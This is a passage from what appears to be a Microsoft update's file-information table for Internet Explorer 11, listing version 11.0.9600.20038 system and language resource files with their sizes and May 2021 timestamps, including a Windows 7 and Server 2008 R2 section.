versioned| 804,470| 19-May-2021| 19:34 \nInetres.adml| Not versioned| 457,561| 19-May-2021| 19:34 \nInetres.adml| Not versioned| 457,561| 19-May-2021| 19:35 \nInetres.adml| Not versioned| 457,561| 19-May-2021| 19:36 \nInetres.adml| Not versioned| 503,909| 19-May-2021| 19:37 \nInetres.adml| Not versioned| 457,561| 19-May-2021| 19:38 \nInetres.adml| Not versioned| 521,583| 19-May-2021| 19:38 \nInetres.adml| Not versioned| 457,561| 19-May-2021| 19:39 \nInetres.adml| Not versioned| 420,082| 19-May-2021| 19:40 \nInetres.adml| Not versioned| 436,651| 19-May-2021| 19:41 \nInetres.adml| Not versioned| 436,651| 19-May-2021| 19:42 \nInetres.admx| Not versioned| 1,678,023| 25-Mar-2021| 1:16 \nJscript9.dll.mui| 11.0.9600.20038| 29,184| 19-May-2021| 19:14 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:15 \nJscript9.dll.mui| 11.0.9600.20038| 32,768| 19-May-2021| 19:16 \nJscript9.dll.mui| 11.0.9600.20038| 33,280| 19-May-2021| 19:17 \nJscript9.dll.mui| 11.0.9600.20038| 35,328| 19-May-2021| 19:17 \nJscript9.dll.mui| 11.0.9600.20038| 37,888| 19-May-2021| 19:18 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 20:10 \nJscript9.dll.mui| 11.0.9600.20038| 34,304| 19-May-2021| 19:19 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:20 \nJscript9.dll.mui| 11.0.9600.20038| 33,280| 19-May-2021| 19:21 \nJscript9.dll.mui| 11.0.9600.20038| 34,304| 19-May-2021| 19:21 \nJscript9.dll.mui| 11.0.9600.20038| 27,648| 19-May-2021| 19:22 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:23 \nJscript9.dll.mui| 11.0.9600.20038| 34,304| 19-May-2021| 19:24 \nJscript9.dll.mui| 11.0.9600.20038| 33,792| 19-May-2021| 19:24 \nJscript9.dll.mui| 11.0.9600.20038| 23,040| 19-May-2021| 19:26 \nJscript9.dll.mui| 11.0.9600.20038| 22,016| 19-May-2021| 19:26 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:27 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:28 \nJscript9.dll.mui| 11.0.9600.20038| 31,232| 19-May-2021| 19:29 \nJscript9.dll.mui| 11.0.9600.20038| 34,304| 19-May-2021| 19:30 \nJscript9.dll.mui| 11.0.9600.20038| 35,840| 19-May-2021| 19:31 \nJscript9.dll.mui| 11.0.9600.20038| 32,768| 19-May-2021| 19:31 \nJscript9.dll.mui| 11.0.9600.20038| 33,280| 19-May-2021| 19:32 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:33 \nJscript9.dll.mui| 11.0.9600.20038| 34,816| 19-May-2021| 19:34 \nJscript9.dll.mui| 11.0.9600.20038| 33,280| 19-May-2021| 19:34 \nJscript9.dll.mui| 11.0.9600.20038| 32,256| 19-May-2021| 19:35 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:36 \nJscript9.dll.mui| 11.0.9600.20038| 32,768| 19-May-2021| 19:37 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:38 \nJscript9.dll.mui| 11.0.9600.20038| 30,720| 19-May-2021| 19:39 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:39 \nJscript9.dll.mui| 11.0.9600.20038| 16,384| 19-May-2021| 19:40 \nJscript9.dll.mui| 11.0.9600.20038| 16,896| 19-May-2021| 19:41 \nJscript9.dll.mui| 11.0.9600.20038| 16,896| 19-May-2021| 19:42 \nJscript9.dll| 11.0.9600.20038| 5,500,928| 18-May-2021| 5:52 \nJscript9diag.dll| 11.0.9600.20038| 814,592| 18-May-2021| 5:21 \nJscript.dll| 5.8.9600.20038| 785,408| 18-May-2021| 5:21 \nVbscript.dll| 5.8.9600.20038| 581,120| 18-May-2021| 5:31 \nIexplore.exe| 11.0.9600.20038| 810,376| 19-May-2021| 18:16 \nMshtml.dll| 11.0.9600.20038| 20,294,656| 18-May-2021| 5:47 \nMshtml.tlb| 11.0.9600.20038| 2,724,864| 18-May-2021| 5:29 \nWow64_microsoft-windows-ie-htmlrendering.ptxml| Not versioned| 3,228| 18-May-2021| 3:03 \nIe9props.propdesc| Not versioned| 2,843| 9-Apr-2021| 0:56 \nIeframe.dll| 11.0.9600.20038| 13,881,856| 18-May-2021| 4:55 \nWow64_ieframe.ptxml| Not versioned| 24,486| 18-May-2021| 3:02 \nJscript9.dll| 11.0.9600.20038| 4,112,896| 18-May-2021| 5:02 \nJscript9diag.dll| 11.0.9600.20038| 620,032| 18-May-2021| 5:10 \nJscript.dll| 5.8.9600.20038| 653,824| 18-May-2021| 5:11 \nVbscript.dll| 5.8.9600.20038| 498,176| 18-May-2021| 5:20 \nUrlmon.dll| 11.0.9600.20038| 1,341,952| 18-May-2021| 4:35 \nWininet.dll.mui| 11.0.9600.20038| 46,592| 19-May-2021| 18:17 \nWininet.dll.mui| 11.0.9600.20038| 52,736| 19-May-2021| 18:18 \nWininet.dll.mui| 11.0.9600.20038| 51,200| 19-May-2021| 18:19 \nWininet.dll.mui| 11.0.9600.20038| 51,200| 19-May-2021| 18:19 \nWininet.dll.mui| 11.0.9600.20038| 56,320| 19-May-2021| 18:20 \nWininet.dll.mui| 11.0.9600.20038| 57,856| 19-May-2021| 18:21 \nWininet.dll.mui| 11.0.9600.20038| 49,664| 19-May-2021| 19:48 \nWininet.dll.mui| 11.0.9600.20038| 54,272| 19-May-2021| 18:22 \nWininet.dll.mui| 11.0.9600.20038| 47,616| 19-May-2021| 18:22 \nWininet.dll.mui| 11.0.9600.20038| 49,152| 19-May-2021| 18:23 \nWininet.dll.mui| 11.0.9600.20038| 55,296| 19-May-2021| 18:24 \nWininet.dll.mui| 11.0.9600.20038| 45,056| 19-May-2021| 18:25 \nWininet.dll.mui| 11.0.9600.20038| 51,712| 19-May-2021| 18:26 \nWininet.dll.mui| 11.0.9600.20038| 51,712| 19-May-2021| 18:27 \nWininet.dll.mui| 11.0.9600.20038| 53,248| 19-May-2021| 18:27 \nWininet.dll.mui| 11.0.9600.20038| 39,424| 19-May-2021| 18:28 \nWininet.dll.mui| 11.0.9600.20038| 35,840| 19-May-2021| 18:29 \nWininet.dll.mui| 11.0.9600.20038| 50,176| 19-May-2021| 18:30 \nWininet.dll.mui| 11.0.9600.20038| 51,200| 19-May-2021| 18:31 \nWininet.dll.mui| 11.0.9600.20038| 50,688| 19-May-2021| 18:32 \nWininet.dll.mui| 11.0.9600.20038| 52,736| 19-May-2021| 18:33 \nWininet.dll.mui| 11.0.9600.20038| 53,760| 19-May-2021| 18:34 \nWininet.dll.mui| 11.0.9600.20038| 54,272| 19-May-2021| 18:34 \nWininet.dll.mui| 11.0.9600.20038| 54,272| 19-May-2021| 18:36 \nWininet.dll.mui| 11.0.9600.20038| 52,736| 19-May-2021| 18:36 \nWininet.dll.mui| 11.0.9600.20038| 51,200| 19-May-2021| 18:37 \nWininet.dll.mui| 11.0.9600.20038| 53,248| 19-May-2021| 18:38 \nWininet.dll.mui| 11.0.9600.20038| 52,736| 19-May-2021| 18:39 \nWininet.dll.mui| 11.0.9600.20038| 51,712| 19-May-2021| 18:39 \nWininet.dll.mui| 11.0.9600.20038| 50,688| 19-May-2021| 18:41 \nWininet.dll.mui| 11.0.9600.20038| 50,688| 19-May-2021| 18:41 \nWininet.dll.mui| 11.0.9600.20038| 50,176| 19-May-2021| 18:42 \nWininet.dll.mui| 11.0.9600.20038| 50,176| 19-May-2021| 18:43 \nWininet.dll.mui| 11.0.9600.20038| 30,720| 19-May-2021| 18:44 \nWininet.dll.mui| 11.0.9600.20038| 30,720| 19-May-2021| 18:45 \nWininet.dll.mui| 11.0.9600.20038| 30,720| 19-May-2021| 18:45 \nInetcpl.cpl| 11.0.9600.20038| 2,058,752| 18-May-2021| 4:50 \nMshtml.dll.mui| 11.0.9600.20038| 307,200| 19-May-2021| 18:17 \nMshtml.dll.mui| 11.0.9600.20038| 293,888| 19-May-2021| 18:18 \nMshtml.dll.mui| 11.0.9600.20038| 290,304| 19-May-2021| 18:19 \nMshtml.dll.mui| 11.0.9600.20038| 289,280| 19-May-2021| 18:19 \nMshtml.dll.mui| 11.0.9600.20038| 299,008| 19-May-2021| 18:20 \nMshtml.dll.mui| 11.0.9600.20038| 303,104| 19-May-2021| 18:21 \nMshtml.dll.mui| 11.0.9600.20038| 282,112| 19-May-2021| 19:47 \nMshtml.dll.mui| 11.0.9600.20038| 296,960| 19-May-2021| 18:22 \nMshtml.dll.mui| 11.0.9600.20038| 283,648| 19-May-2021| 18:23 \nMshtml.dll.mui| 11.0.9600.20038| 291,840| 19-May-2021| 18:23 \nMshtml.dll.mui| 11.0.9600.20038| 299,520| 19-May-2021| 18:24 \nMshtml.dll.mui| 11.0.9600.20038| 275,968| 19-May-2021| 18:25 \nMshtml.dll.mui| 11.0.9600.20038| 290,816| 19-May-2021| 18:26 \nMshtml.dll.mui| 11.0.9600.20038| 293,376| 19-May-2021| 18:27 \nMshtml.dll.mui| 11.0.9600.20038| 296,960| 19-May-2021| 18:28 \nMshtml.dll.mui| 11.0.9600.20038| 258,048| 19-May-2021| 18:28 \nMshtml.dll.mui| 11.0.9600.20038| 256,512| 19-May-2021| 18:29 \nMshtml.dll.mui| 11.0.9600.20038| 289,280| 19-May-2021| 18:30 \nMshtml.dll.mui| 11.0.9600.20038| 288,256| 19-May-2021| 18:31 \nMshtml.dll.mui| 11.0.9600.20038| 285,184| 19-May-2021| 18:32 \nMshtml.dll.mui| 11.0.9600.20038| 295,424| 19-May-2021| 18:33 \nMshtml.dll.mui| 11.0.9600.20038| 297,472| 19-May-2021| 18:34 \nMshtml.dll.mui| 11.0.9600.20038| 292,864| 19-May-2021| 18:35 \nMshtml.dll.mui| 11.0.9600.20038| 295,424| 19-May-2021| 18:35 \nMshtml.dll.mui| 11.0.9600.20038| 294,400| 19-May-2021| 18:36 \nMshtml.dll.mui| 11.0.9600.20038| 294,400| 19-May-2021| 18:37 \nMshtml.dll.mui| 11.0.9600.20038| 292,864| 19-May-2021| 18:38 \nMshtml.dll.mui| 11.0.9600.20038| 290,816| 19-May-2021| 18:39 \nMshtml.dll.mui| 11.0.9600.20038| 288,768| 19-May-2021| 18:39 \nMshtml.dll.mui| 11.0.9600.20038| 286,208| 19-May-2021| 18:40 \nMshtml.dll.mui| 11.0.9600.20038| 281,600| 19-May-2021| 18:41 \nMshtml.dll.mui| 11.0.9600.20038| 286,720| 19-May-2021| 18:42 \nMshtml.dll.mui| 11.0.9600.20038| 292,352| 19-May-2021| 18:43 \nMshtml.dll.mui| 11.0.9600.20038| 242,176| 19-May-2021| 18:44 \nMshtml.dll.mui| 11.0.9600.20038| 243,200| 19-May-2021| 18:45 \nMshtml.dll.mui| 11.0.9600.20038| 243,200| 19-May-2021| 18:46 \nUrlmon.dll.mui| 11.0.9600.20038| 46,080| 19-May-2021| 18:17 \nUrlmon.dll.mui| 11.0.9600.20038| 50,176| 19-May-2021| 18:18 \nUrlmon.dll.mui| 11.0.9600.20038| 48,640| 19-May-2021| 18:18 \nUrlmon.dll.mui| 11.0.9600.20038| 49,664| 19-May-2021| 18:19 \nUrlmon.dll.mui| 11.0.9600.20038| 51,712| 19-May-2021| 18:20 \nUrlmon.dll.mui| 11.0.9600.20038| 54,272| 19-May-2021| 18:21 \nUrlmon.dll.mui| 11.0.9600.20038| 48,128| 19-May-2021| 19:47 \nUrlmon.dll.mui| 11.0.9600.20038| 50,176| 19-May-2021| 18:22 \nUrlmon.dll.mui| 11.0.9600.20038| 47,616| 19-May-2021| 18:23 \nUrlmon.dll.mui| 11.0.9600.20038| 49,152| 19-May-2021| 18:23 \nUrlmon.dll.mui| 11.0.9600.20038| 50,688| 19-May-2021| 18:24 \nUrlmon.dll.mui| 11.0.9600.20038| 45,056| 19-May-2021| 18:25 \nUrlmon.dll.mui| 11.0.9600.20038| 49,152| 19-May-2021| 18:26 \nUrlmon.dll.mui| 11.0.9600.20038| 49,152| 19-May-2021| 18:27 \nUrlmon.dll.mui| 11.0.9600.20038| 49,664| 19-May-2021| 18:28 \nUrlmon.dll.mui| 11.0.9600.20038| 39,936| 19-May-2021| 18:28 \nUrlmon.dll.mui| 11.0.9600.20038| 39,424| 19-May-2021| 18:30 \nUrlmon.dll.mui| 11.0.9600.20038| 47,616| 19-May-2021| 18:30 \nUrlmon.dll.mui| 11.0.9600.20038| 47,616| 19-May-2021| 18:31 \nUrlmon.dll.mui| 11.0.9600.20038| 48,640| 19-May-2021| 18:32 \nUrlmon.dll.mui| 11.0.9600.20038| 51,200| 19-May-2021| 18:33 \nUrlmon.dll.mui| 11.0.9600.20038| 50,688| 19-May-2021| 18:34 \nUrlmon.dll.mui| 11.0.9600.20038| 49,664| 19-May-2021| 18:35 \nUrlmon.dll.mui| 11.0.9600.20038| 50,176| 19-May-2021| 18:36 \nUrlmon.dll.mui| 11.0.9600.20038| 49,152| 19-May-2021| 18:36 \nUrlmon.dll.mui| 11.0.9600.20038| 48,640| 19-May-2021| 18:37 \nUrlmon.dll.mui| 11.0.9600.20038| 50,176| 19-May-2021| 18:38 \nUrlmon.dll.mui| 11.0.9600.20038| 48,640| 19-May-2021| 18:39 \nUrlmon.dll.mui| 11.0.9600.20038| 49,664| 19-May-2021| 18:39 \nUrlmon.dll.mui| 11.0.9600.20038| 48,640| 19-May-2021| 18:40 \nUrlmon.dll.mui| 11.0.9600.20038| 48,128| 19-May-2021| 18:41 \nUrlmon.dll.mui| 11.0.9600.20038| 49,152| 19-May-2021| 18:42 \nUrlmon.dll.mui| 11.0.9600.20038| 48,128| 19-May-2021| 18:43 \nUrlmon.dll.mui| 11.0.9600.20038| 35,328| 19-May-2021| 18:43 \nUrlmon.dll.mui| 11.0.9600.20038| 35,328| 19-May-2021| 18:44 \nUrlmon.dll.mui| 11.0.9600.20038| 35,328| 19-May-2021| 18:45 \nJsproxy.dll| 11.0.9600.20038| 47,104| 18-May-2021| 5:13 \nWininet.dll| 11.0.9600.20038| 4,387,840| 18-May-2021| 4:39 \nInetcpl.cpl.mui| 11.0.9600.20038| 114,176| 19-May-2021| 18:17 \nInetcpl.cpl.mui| 11.0.9600.20038| 130,560| 19-May-2021| 18:18 \nInetcpl.cpl.mui| 11.0.9600.20038| 124,928| 19-May-2021| 18:18 \nInetcpl.cpl.mui| 11.0.9600.20038| 122,880| 19-May-2021| 18:19 \nInetcpl.cpl.mui| 11.0.9600.20038| 130,048| 19-May-2021| 18:20 \nInetcpl.cpl.mui| 11.0.9600.20038| 138,240| 19-May-2021| 18:21 \nInetcpl.cpl.mui| 11.0.9600.20038| 114,688| 19-May-2021| 19:48 \nInetcpl.cpl.mui| 11.0.9600.20038| 131,584| 19-May-2021| 18:22 \nInetcpl.cpl.mui| 11.0.9600.20038| 117,760| 19-May-2021| 18:23 \nInetcpl.cpl.mui| 11.0.9600.20038| 122,368| 19-May-2021| 18:23 \nInetcpl.cpl.mui| 11.0.9600.20038| 134,144| 19-May-2021| 18:24 \nInetcpl.cpl.mui| 11.0.9600.20038| 107,008| 19-May-2021| 18:25 \nInetcpl.cpl.mui| 11.0.9600.20038| 123,392| 19-May-2021| 18:26 \nInetcpl.cpl.mui| 11.0.9600.20038| 127,488| 19-May-2021| 18:27 \nInetcpl.cpl.mui| 11.0.9600.20038| 128,512| 19-May-2021| 18:28 \nInetcpl.cpl.mui| 11.0.9600.20038| 88,576| 19-May-2021| 18:28 \nInetcpl.cpl.mui| 11.0.9600.20038| 82,944| 19-May-2021| 18:30 \nInetcpl.cpl.mui| 11.0.9600.20038| 125,440| 19-May-2021| 18:30 \nInetcpl.cpl.mui| 11.0.9600.20038| 123,392| 19-May-2021| 18:31 \nInetcpl.cpl.mui| 11.0.9600.20038| 120,320| 19-May-2021| 18:32 \nInetcpl.cpl.mui| 11.0.9600.20038| 130,560| 19-May-2021| 18:33 \nInetcpl.cpl.mui| 11.0.9600.20038| 129,024| 19-May-2021| 18:34 \nInetcpl.cpl.mui| 11.0.9600.20038| 125,952| 19-May-2021| 18:34 \nInetcpl.cpl.mui| 11.0.9600.20038| 129,024| 19-May-2021| 18:35 \nInetcpl.cpl.mui| 11.0.9600.20038| 128,000| 19-May-2021| 18:36 \nInetcpl.cpl.mui| 11.0.9600.20038| 123,904| 19-May-2021| 18:37 \nInetcpl.cpl.mui| 11.0.9600.20038| 129,024| 19-May-2021| 18:38 \nInetcpl.cpl.mui| 11.0.9600.20038| 123,904| 19-May-2021| 18:39 \nInetcpl.cpl.mui| 11.0.9600.20038| 124,416| 19-May-2021| 18:40 \nInetcpl.cpl.mui| 11.0.9600.20038| 121,856| 19-May-2021| 18:40 \nInetcpl.cpl.mui| 11.0.9600.20038| 115,712| 19-May-2021| 18:41 \nInetcpl.cpl.mui| 11.0.9600.20038| 123,904| 19-May-2021| 18:42 \nInetcpl.cpl.mui| 11.0.9600.20038| 125,440| 19-May-2021| 18:43 \nInetcpl.cpl.mui| 11.0.9600.20038| 72,704| 19-May-2021| 18:44 \nInetcpl.cpl.mui| 11.0.9600.20038| 73,728| 19-May-2021| 18:45 \nInetcpl.cpl.mui| 11.0.9600.20038| 73,728| 19-May-2021| 18:46 \nMsfeedsbs.dll| 11.0.9600.20038| 52,736| 18-May-2021| 4:57 \nMsfeedsbs.mof| Not versioned| 1,574| 18-May-2021| 3:12 \nMsfeedssync.exe| 11.0.9600.20038| 11,776| 18-May-2021| 5:19 \nIeproxy.dll| 11.0.9600.20038| 310,784| 18-May-2021| 4:26 \nIeshims.dll| 11.0.9600.20038| 290,304| 18-May-2021| 4:32 \nIertutil.dll| 11.0.9600.20038| 2,308,608| 18-May-2021| 5:19 \nSqmapi.dll| 6.2.9200.16384| 228,232| 19-May-2021| 18:16 \nIeframe.dll.mui| 11.0.9600.20038| 2,066,432| 19-May-2021| 18:17 \nIeframe.dll.mui| 11.0.9600.20038| 2,121,216| 19-May-2021| 18:18 \nIeframe.dll.mui| 11.0.9600.20038| 2,075,136| 19-May-2021| 18:19 \nIeframe.dll.mui| 11.0.9600.20038| 2,063,872| 19-May-2021| 18:20 \nIeframe.dll.mui| 11.0.9600.20038| 2,314,240| 19-May-2021| 18:21 \nIeframe.dll.mui| 11.0.9600.20038| 2,390,528| 19-May-2021| 18:21 \nIeframe.dll.mui| 11.0.9600.20038| 2,033,152| 19-May-2021| 19:48 \nIeframe.dll.mui| 11.0.9600.20038| 2,307,584| 19-May-2021| 18:22 \nIeframe.dll.mui| 11.0.9600.20038| 2,255,872| 19-May-2021| 18:23 \nIeframe.dll.mui| 11.0.9600.20038| 2,061,312| 19-May-2021| 18:24 \nIeframe.dll.mui| 11.0.9600.20038| 2,326,016| 19-May-2021| 18:25 \nIeframe.dll.mui| 11.0.9600.20038| 2,019,840| 19-May-2021| 18:26 \nIeframe.dll.mui| 11.0.9600.20038| 2,071,040| 19-May-2021| 18:26 \nIeframe.dll.mui| 11.0.9600.20038| 2,082,816| 19-May-2021| 18:27 \nIeframe.dll.mui| 11.0.9600.20038| 2,307,584| 19-May-2021| 18:28 \nIeframe.dll.mui| 11.0.9600.20038| 2,170,368| 19-May-2021| 18:29 \nIeframe.dll.mui| 11.0.9600.20038| 2,153,984| 19-May-2021| 18:30 \nIeframe.dll.mui| 11.0.9600.20038| 2,291,712| 19-May-2021| 18:31 \nIeframe.dll.mui| 11.0.9600.20038| 2,283,520| 19-May-2021| 18:32 \nIeframe.dll.mui| 11.0.9600.20038| 2,052,096| 19-May-2021| 18:33 \nIeframe.dll.mui| 11.0.9600.20038| 2,301,952| 19-May-2021| 18:33 \nIeframe.dll.mui| 11.0.9600.20038| 2,093,056| 19-May-2021| 18:34 \nIeframe.dll.mui| 11.0.9600.20038| 2,075,648| 19-May-2021| 18:35 \nIeframe.dll.mui| 11.0.9600.20038| 2,299,392| 19-May-2021| 18:36 \nIeframe.dll.mui| 11.0.9600.20038| 2,094,592| 19-May-2021| 18:37 \nIeframe.dll.mui| 11.0.9600.20038| 2,316,800| 19-May-2021| 18:38 \nIeframe.dll.mui| 11.0.9600.20038| 2,305,536| 19-May-2021| 18:38 \nIeframe.dll.mui| 11.0.9600.20038| 2,278,912| 19-May-2021| 18:39 \nIeframe.dll.mui| 11.0.9600.20038| 2,277,888| 19-May-2021| 18:40 \nIeframe.dll.mui| 11.0.9600.20038| 2,060,288| 19-May-2021| 18:41 \nIeframe.dll.mui| 11.0.9600.20038| 2,315,776| 19-May-2021| 18:42 \nIeframe.dll.mui| 11.0.9600.20038| 2,278,912| 19-May-2021| 18:42 \nIeframe.dll.mui| 11.0.9600.20038| 2,324,992| 19-May-2021| 18:43 \nIeframe.dll.mui| 11.0.9600.20038| 2,098,176| 19-May-2021| 18:44 \nIeframe.dll.mui| 11.0.9600.20038| 1,890,304| 19-May-2021| 18:45 \nIeframe.dll.mui| 11.0.9600.20038| 1,890,304| 19-May-2021| 18:46 \nJscript9.dll.mui| 11.0.9600.20038| 29,184| 19-May-2021| 18:17 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 18:18 \nJscript9.dll.mui| 11.0.9600.20038| 32,768| 19-May-2021| 18:19 \nJscript9.dll.mui| 11.0.9600.20038| 33,280| 19-May-2021| 18:19 \nJscript9.dll.mui| 11.0.9600.20038| 35,328| 19-May-2021| 18:20 \nJscript9.dll.mui| 11.0.9600.20038| 37,888| 19-May-2021| 18:21 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 19:47 \nJscript9.dll.mui| 11.0.9600.20038| 34,304| 19-May-2021| 18:22 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 18:23 \nJscript9.dll.mui| 11.0.9600.20038| 33,280| 19-May-2021| 18:23 \nJscript9.dll.mui| 11.0.9600.20038| 34,304| 19-May-2021| 18:24 \nJscript9.dll.mui| 11.0.9600.20038| 27,648| 19-May-2021| 18:25 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 18:26 \nJscript9.dll.mui| 11.0.9600.20038| 34,304| 19-May-2021| 18:27 \nJscript9.dll.mui| 11.0.9600.20038| 33,792| 19-May-2021| 18:27 \nJscript9.dll.mui| 11.0.9600.20038| 23,040| 19-May-2021| 18:28 \nJscript9.dll.mui| 11.0.9600.20038| 22,016| 19-May-2021| 18:29 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 18:30 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 18:31 \nJscript9.dll.mui| 11.0.9600.20038| 31,232| 19-May-2021| 18:32 \nJscript9.dll.mui| 11.0.9600.20038| 34,304| 19-May-2021| 18:33 \nJscript9.dll.mui| 11.0.9600.20038| 35,840| 19-May-2021| 18:34 \nJscript9.dll.mui| 11.0.9600.20038| 32,768| 19-May-2021| 18:35 \nJscript9.dll.mui| 11.0.9600.20038| 33,280| 19-May-2021| 18:35 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 18:36 \nJscript9.dll.mui| 11.0.9600.20038| 34,816| 19-May-2021| 18:38 \nJscript9.dll.mui| 11.0.9600.20038| 33,280| 19-May-2021| 18:38 \nJscript9.dll.mui| 11.0.9600.20038| 32,256| 19-May-2021| 18:39 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 18:39 \nJscript9.dll.mui| 11.0.9600.20038| 32,768| 19-May-2021| 18:40 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 18:41 \nJscript9.dll.mui| 11.0.9600.20038| 30,720| 19-May-2021| 18:42 \nJscript9.dll.mui| 11.0.9600.20038| 29,696| 19-May-2021| 18:43 \nJscript9.dll.mui| 11.0.9600.20038| 16,384| 19-May-2021| 18:43 \nJscript9.dll.mui| 11.0.9600.20038| 16,896| 19-May-2021| 18:44 \nJscript9.dll.mui| 11.0.9600.20038| 16,896| 19-May-2021| 18:45 \nPackage.cab| Not versioned| 302,961| 19-May-2021| 20:59 \n \n### Windows 7 and Windows Server 2008 R2\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 11.0.9600.20038| 17-May-2021| 21:35| 1,341,952 \niexplore.exe| 11.0.9600.20038| 20-May-2021| 15:38| 810,376 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:38| 31,744 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 36,352 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 35,328 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 34,816 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 36,864 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 39,424 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 32,768 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 37,376 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 33,280 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 34,816 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 38,400 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 30,720 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 34,816 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 35,328 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 36,864 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 25,600 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 24,576 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 35,840 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 34,304 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 34,304 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 36,352 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 35,840 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 34,816 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:57| 35,840 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 35,840 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 34,304 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 35,840 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 34,816 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 34,816 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 34,816 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 33,280 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 34,304 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 34,304 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 20,992 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 21,504 \nwebcheck.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 21,504 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:38| 46,592 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 52,736 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 51,200 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 51,200 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 56,320 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 57,856 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 49,664 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 54,272 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 47,616 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 49,152 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 55,296 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 45,056 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 51,712 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 51,712 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 53,248 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 39,424 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 35,840 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 50,176 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 51,200 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 50,688 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 52,736 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 53,760 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 54,272 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:57| 54,272 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 52,736 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 51,200 